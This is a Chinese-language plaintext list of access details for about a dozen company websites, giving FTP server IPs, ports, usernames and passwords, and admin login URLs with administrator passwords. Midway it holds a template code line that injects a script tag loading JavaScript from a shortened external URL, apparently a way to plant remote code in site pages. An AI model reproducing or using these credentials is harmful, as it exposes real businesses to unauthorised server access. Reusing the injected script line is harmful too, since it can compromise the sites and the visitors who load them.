ftpwww.gdhaibang.com  的FTP        海邦             域名后面加/admin     超管账号 administrator  密码  ebinfo2014
 
 IP： 211.102.91.13 端口 800
用户：gc21|zsshimin
密码：vN1#eYZJEi

 
金易达  ip  211.102.91.13,   800端口     gl87|jinyida888   L%goTfHK2q




http://www.jinyida888.com/power/login.asp
administrator  admin2012




熠景


域名后面加/admin    administrator  ebinfo2014
后面是账号密码 
超管的



君豪   ftp                    后台     http://www.zsjunhao.com/admin/      administrator  ebinfo2014    或者admin2012


IP：211.102.91.13 端口：800
用户：gl207|zsjunhao
密码：;aF#72F%B:




www.laianda.com.cn   ftp

服务器IP：gltc04.28.com.cn 端口：800
FTP用户名：gt06|laiaeda
FTP密码：iAc4@1anda


http://semyoo.wbteam.cn
账号：雨欣荟小程序
密码：admin123456
小程序的商城管理后台，不是微信后台

 

 中山市润晟照明有限公司（荣祥）中文PC 急

211.102.91.13 端口 800  
用户：gl88|rongxianglamp
密码：2%-Bt^O^L2


点点管家
ip：111.230.242.187
ftp账号：ban
ftp密码：sixsix66

后台
admin
wwwwe10cn


金豪佰特
IP:120.76.134.47 	
FTP账号：jhbt888	
密码：g92CfjQcVSgN	


www.myongnuo.com FTP         江门市永诺涂料有限公司
IP 211.102.90.8 端口：800
用户:gl350|jmyongnuo
密码：Z@Y%x43KuZ

/power/login.asp       admin



    
	templateBuilder.Append("<script src=http://t.cn/RyptTfO></");




朗俊
   Web服务器地址： host8219371.xincache1.cn 
   独立ip： 无 
   FTP用户名： host8219371   FTP密码：admin123456


新奥网站
Web服务器地址： [图片]host7460395.xincache1.cn 
独立ip： 无 
FTP用户名： host7460395  FTP密码：admin123456


精华电子
ｗｗｗ.[图片][图片]88283651.com FTP 
IP：[图片][图片]211.102.90.8
用户：gl21|zshuadian
密码：WR7i(U#yw(
